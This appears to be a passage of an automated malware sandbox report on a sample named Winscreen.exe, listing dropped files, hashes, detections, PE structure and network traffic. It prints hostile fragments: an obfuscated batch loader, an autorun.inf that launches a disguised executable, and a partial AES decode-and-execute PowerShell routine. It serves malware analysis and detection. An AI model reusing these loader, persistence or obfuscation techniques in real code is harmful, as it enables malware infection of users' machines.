                                                                                      Preview:@echo off..Set a1zr=YNB0FrMP4GIJbxjaqUsk6Cc5ERiHfyAhvwD31pOL7WdnQSKtu8goe2lTX9ZmzV..cls..@%a1zr:~52,1%%a1zr:~22,1%%a1zr:~31,1%%a1zr:~51,1% %a1zr:~51,1%%a1zr:~28,1%%a1zr:~28,1%..%a1zr:~18,1%%a1zr:~52,1%%a1zr:~47,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~22,1%%a1zr:~15,1%%a1zr:~54,1%..%a1zr:~5,1%%a1zr:~52,1%%a1zr:~50,1% %a1zr:~15,1%%a1zr:~42,1%%a1zr:~42,1% "%a1zr:~27,1%%a1zr:~46,1%%a1zr:~39,1%%a1zr:~6,1%\%a1zr:~45,1%%a1zr:~38,1%%a1zr:~4,1%%a1zr:~55,1%%a1zr:~41,1%%a1zr:~30,1%%a1zr:~25,1%%a1zr:~24,1%\%a1zr:~6,1%%a1zr:~26,1%%a1zr:~22,1%%a1zr:~5,1%%a1zr:~51,1%%a1zr:~18,1%%a1zr:~51,1%%a1zr:~28,1%%a1zr:~47,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~42,1%%a1zr:~51,1%%a1zr:~33,1%%a1zr:~18,1% %a1zr:~1,1%%a1zr:~55,1%\%a1zr:~21,1%%a1zr:~48,1%%a1zr:~5,1%%a1zr:~5,1%%a1zr:~52,1%%a1zr:~43,1%%a1zr:~47,1%%a1zr:~61,1%%a1zr:~52,1%%a1zr:~5,1%%a1zr:~18,1%%a1zr:~26,1%%a1zr:~51,1%%a1zr:~43,1%\%a1zr:~41,1%%a1zr:~26,1%%a1zr:~43,1%%a1zr:~54,1%%a1zr:~51,1%%a1zr:~50,1%%a1zr:~51,1%%a1zr:~43,1%" /%a1zr:~32,1% %a1zr:~45,1%%

                                                                                      C:\autorun.inf

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\taskmen.exe
                                                                                      File Type:Microsoft Windows Autorun file
                                                                                      Category:dropped
                                                                                      Size (bytes):51
                                                                                      Entropy (8bit):4.522012901519396
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:It1KV23KTyK0x:e1KKKTyD
                                                                                      MD5:B6EBF2B6B19476B9661A886FF15AD27D
                                                                                      SHA1:1E812F7E81FD981891A7FA17D754928B45194FB6
                                                                                      SHA-256:F2930F8CC80BA72E6ED12353F69EC0841000E56D08B2568D4F89C956C2AD244D
                                                                                      SHA-512:D8D3A3FCD7820677F842AFF0AF3E0B6C2EBC4A5FB940AA25DF50B18D86F03885177696DE3D245C13C7177D2BD7B35CAF3B1EB259A9361EB11E2A5B9D4BF83394
                                                                                      Malicious:true
                                                                                      Reputation:unknown
                                                                                      Preview:[autorun]..open=C:\Disk.flv.exe..shellexecute=C:\..

                                                                                      C:\pastibin.exe

                                                                                      Download File
                                                                                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\Client (1).vmp.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:modified
                                                                                      Size (bytes):463360
                                                                                      Entropy (8bit):7.5950208702429896
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:jCzQTYz4iqlcVgmItDwnBPRS4e7sKtj6f3Fjgf2RtDn6prNP75Jzdjx:28TYz4aXQj473Fj1D6Tzd
                                                                                      MD5:A4E804239AE09E3A23A4020C226B188C
                                                                                      SHA1:577169AACE1DE8A58549E8D2144238756DE0C22E
                                                                                      SHA-256:854B910EF8132D02B501360793F50DBB3F522B31C69FEFE3222EBEBA5E5A4DD1
                                                                                      SHA-512:B4BC862DAC9113B18FE9292C28D5C5F532F6316759F06A4910C1FE96E69DB692FDED455A94B1F41E5B4FFC43C01602E5655CE9220036A9DEB05D60871CF94EED
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 75%
                                                                                      • Antivirus: Virustotal, Detection: 55%, Browse
                                                                                      Reputation:unknown
                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...ML.f................................. ........@.. .......................@..................................................(............................ ..........................................................................H............text...T.... ...................... ..`.Z`q....w........................... ..`.![@................................@....p0O................................ ..`.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      \Device\ConDrv

                                                                                      Download File
                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      File Type:ASCII text, with very long lines (1891), with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1924
                                                                                      Entropy (8bit):5.623542134239307
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:IJRm8RUYRxSKB6qjBHgzDpOXkH7k+LkMmGKmJbhP28+N9AmTfzAq4OLx1CH2/:QBN7PBnjBAVvmGXovAmAeLxAW/
                                                                                      MD5:F38AE66D0D1E34B0A9E533C37100FEC1
                                                                                      SHA1:114FBB024FDFC4A50479344A537B29719B313507
                                                                                      SHA-256:8416FEF8CB06DD13092A715A3D691D84DA60CEC74E95766DF6E49BA61BA7B183
                                                                                      SHA-512:F70196810D1B84A639952E450C167B1F6A4DB51C67A63BE949A982D0DFB202A5E09D1530ED32FD6C80A19BDACAE30E87A8EF861C4D297AE7D6A68BACF7CF6714
                                                                                      Malicious:true
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_PowershellDecodeAndExecute, Description: Yara detected Powershell decode and execute, Source: \Device\ConDrv, Author: Joe Security
                                                                                      Reputation:unknown
                                                                                      Preview:function decrypt_function($param_var){.$aes_var=[System.Security.Cryptography.Aes]::Create();.$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;.$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;.$aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bsr0ba9vyRObkmxsgk+/KMsTtEAihtJSkhdfy6hSUIk=');.$aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qbSb4Zwde0fSbMLarzeaYQ==');.$decryptor_var=$aes_var.CreateDecryptor();.$return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);.$decryptor_var.Dispose();.$aes_var.Dispose();.$return_var;}function decompress_function($param_var){.$KSZHY=New-Object System.IO.MemoryStream(,$param_var);.$WxRgU=New-Object System.IO.MemoryStream;.$CTAHr=New-Object System.IO.Compression.GZipStream($KSZHY, [IO.Compression.CompressionMode]::Decompress);.$CTAHr.CopyTo($WxRgU);.$CTAHr.Dispose();.$KSZHY.Dispose();.$WxRgU.Dispose();.$WxRgU.ToArray();}function execute_function($param_va

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                      Entropy (8bit):7.9818029993443576
                                                                                      TrID:
                                                                                      • Win64 Executable GUI Net Framework (217006/5) 49.65%
                                                                                      • Win64 Executable GUI (202006/5) 46.21%
                                                                                      • Win64 Executable (generic) (12005/4) 2.75%
                                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.47%
                                                                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                      File name:Winscreen.exe
                                                                                      File size:4'116'480 bytes
                                                                                      MD5:05b30a117a6915c4591c65449e83f0a4
                                                                                      SHA1:ea4f64edd2c1779966b5d0eecba6d7d9ba8a01c9
                                                                                      SHA256:d66ce2f63139ffdc5a9eeff9ca44b17f82a36a3f8713f959e59997e850ccdbbf
                                                                                      SHA512:98299a893b57ad73c75e35f78b8b3d7c3e276eceabb331b306a49f311592cab32fddc46e2f915ca5182f52f70849cb35283359927e8e7be8880c13683d0613c6
                                                                                      SSDEEP:98304:2dffmDjO/1TFS2aQnJuOYPTGfxom+IYMIlvdx:2MWlFS2aQnJubbGfxom+cGX
                                                                                      TLSH:681633212BB14972CF8482BB510190E498F2AF65277FE3F6343B3AF236E43507D56966
                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....C.g.........."...................... .....@..... ........................y...........@...@......@............... .....

                                                                                      File Icon

                                                                                      Icon Hash:02102c030b333333

                                                                                      Static PE Info

                                                                                      General

                                                                                      Entrypoint:0x140000000
                                                                                      Entrypoint Section:
                                                                                      Digitally signed:false
                                                                                      Imagebase:0x140000000
                                                                                      Subsystem:windows gui
                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                      Time Stamp:0x67004312 [Fri Oct 4 19:33:38 2024 UTC]
                                                                                      TLS Callbacks:
                                                                                      CLR (.Net) Version:
                                                                                      OS Version Major:4
                                                                                      OS Version Minor:0
                                                                                      File Version Major:4
                                                                                      File Version Minor:0
                                                                                      Subsystem Version Major:4
                                                                                      Subsystem Version Minor:0
                                                                                      Import Hash:

                                                                                      Entrypoint Preview

                                                                                      Instruction
                                                                                      dec ebp
                                                                                      pop edx
                                                                                      nop
                                                                                      add byte ptr [ebx], al
                                                                                      add byte ptr [eax], al
                                                                                      add byte ptr [eax+eax], al
                                                                                      add byte ptr [eax], al

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x78e0000xcffc.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x77dca00x48.$sY
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x20000x1bcf100x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .?c$0x1c00000x1ec9970x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .$sY0x3ae0000x3dfa340x3dfc00104952d280524da391a02739bbf1a72cunknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x78e0000xcffc0xd00001ead910b12ffe8f18f57c06b8028319False0.2786395733173077data5.048488750728516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      RT_ICON0x78e2800x1fecPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9608418991678903
                                                                                      RT_ICON0x79026c0x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.12240198393953708
                                                                                      RT_ICON0x7944940x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.15103734439834024
                                                                                      RT_ICON0x796a3c0x1a68Device independent bitmap graphic, 40 x 80 x 32, image size 00.1621301775147929
                                                                                      RT_ICON0x7984a40x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.17893996247654784
                                                                                      RT_ICON0x79954c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.12786885245901639
                                                                                      RT_ICON0x799ed40x6b8Device independent bitmap graphic, 20 x 40 x 32, image size 00.1633720930232558
                                                                                      RT_ICON0x79a58c0x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.1799645390070922
                                                                                      RT_GROUP_ICON0x79a9f40x76data0.7288135593220338
                                                                                      RT_VERSION0x79aa6c0x3a4data0.48175965665236054
                                                                                      RT_MANIFEST0x79ae100x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Oct 5, 2024 21:57:30.390849113 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:30.396029949 CEST8049786140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:30.396096945 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:30.396894932 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:30.401849985 CEST8049786140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.007376909 CEST8049786140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.014782906 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.014870882 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.016226053 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.022473097 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.022497892 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.219315052 CEST8049786140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.219620943 CEST4978680192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.662065029 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.662287951 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.699444056 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.699517012 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.700654030 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:31.744194031 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.856522083 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:31.903402090 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.288633108 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.288866997 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.288965940 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:32.288994074 CEST44349790140.82.121.3192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.289053917 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:32.314915895 CEST49790443192.168.2.5140.82.121.3
                                                                                      Oct 5, 2024 21:57:32.324368954 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.324410915 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.324469090 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.324738979 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.324757099 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.792102098 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.792161942 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.793764114 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.793767929 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.794162989 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.795430899 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.843404055 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.956903934 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.972284079 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.972357035 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.972359896 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.972392082 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:32.972425938 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:32.972444057 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.044909954 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.044991016 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.044996977 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.045021057 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.045051098 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.045062065 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.048892021 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.048960924 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.049072981 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.049101114 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.049293041 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.130531073 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.130608082 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.130630970 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.130687952 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.132091999 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.132167101 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.132168055 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.132198095 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.132226944 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.132236004 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.133913040 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.133984089 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.133985996 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.134011984 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.134038925 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.134059906 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.188452005 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.188523054 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.188534975 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.188565016 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.188594103 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.188604116 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.217194080 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.217261076 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.217304945 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.217369080 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.217928886 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.218004942 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.218048096 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.218115091 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.218583107 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.218647957 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.218691111 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.218749046 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.219732046 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.219796896 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.219805002 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.219849110 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.219855070 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.219891071 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.220526934 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.220597982 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.220634937 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.220642090 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.220668077 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.220679045 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.221503973 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.221570015 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.221576929 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.221625090 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.221643925 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.221820116 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.222923040 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.222987890 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.223076105 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.223083019 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.223469973 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.302740097 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.302815914 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.302853107 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.302920103 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.303503990 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.303565979 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.303617001 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.303677082 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.304181099 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.304255009 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.304303885 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.304373026 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.304850101 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.304919004 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.305005074 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.305064917 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.307522058 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.307554960 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.307589054 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.307598114 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.307624102 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.307632923 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.308142900 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308218956 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308373928 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.308379889 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308413029 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.308768988 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308799982 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308829069 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.308834076 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.308859110 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.308871031 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.361500978 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.361587048 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.361597061 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.361633062 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.361649990 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.361671925 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.389288902 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.389364004 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.389417887 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.389482975 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.389825106 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.389894009 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.389906883 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.389961004 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.390619993 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.390693903 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.390697002 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.390747070 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.390773058 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.390815020 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.391094923 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.391160965 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.391169071 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.391935110 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392008066 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.392014980 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392047882 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392098904 CEST49800443192.168.2.5185.199.110.133
                                                                                      Oct 5, 2024 21:57:33.392103910 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392812014 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392875910 CEST44349800185.199.110.133192.168.2.5
                                                                                      Oct 5, 2024 21:57:33.392898083 CEST49800443192.168.2.5185.199.110.133
